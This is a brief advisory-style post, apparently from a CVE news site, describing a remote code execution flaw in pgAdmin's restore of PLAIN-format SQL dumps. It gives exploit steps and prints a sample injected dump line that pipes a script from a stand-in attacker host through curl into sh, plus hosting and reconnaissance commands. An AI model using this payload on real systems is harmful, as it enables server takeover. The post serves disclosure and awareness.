pgAdmin, Remote Code Execution, CVE-2025-12762 (Critical)

Listen to this Post

How the CVE Works

The vulnerability exists in pgAdmin’s server-mode when restoring from a PLAIN-format PostgreSQL dump file. These dump files are SQL scripts. During the restore process, pgAdmin does not properly sanitize user-controlled input from the dump file before passing it to the underlying system shell for execution. An attacker can craft a malicious dump file containing shell metacharacters or complete commands. When a victim imports this file, the embedded commands are executed with the privileges of the pgAdmin server process, leading to full Remote Code Execution on the host system. This attack is possible because the restore functionality insecurely constructs command-line arguments for external utilities like psql.

DailyCVE Form:

Platform: pgAdmin
Version: <= 9.9
Vulnerability: Remote Code Execution
Severity: Critical
date: 11/13/2025

Prediction: Patch by 12/2025

What Undercode Say:

Example malicious entry in a dump file
SELECT '';\n| curl http://attacker.com/script.sh | sh; --
An attacker might host the malicious dump
python3 -m http.server 8000
Post-exploitation reconnaissance
whoami && hostname

How Exploit:

  1. Attacker creates a malicious PLAIN-format SQL dump file.

2. File contains embedded shell command sequences.

  1. Victim imports the file via pgAdmin’s restore feature.

4. Unsanitized input passes to a system shell.

5. Attacker’s commands execute on the server.

Protection from this CVE

Upgrade pgAdmin immediately.
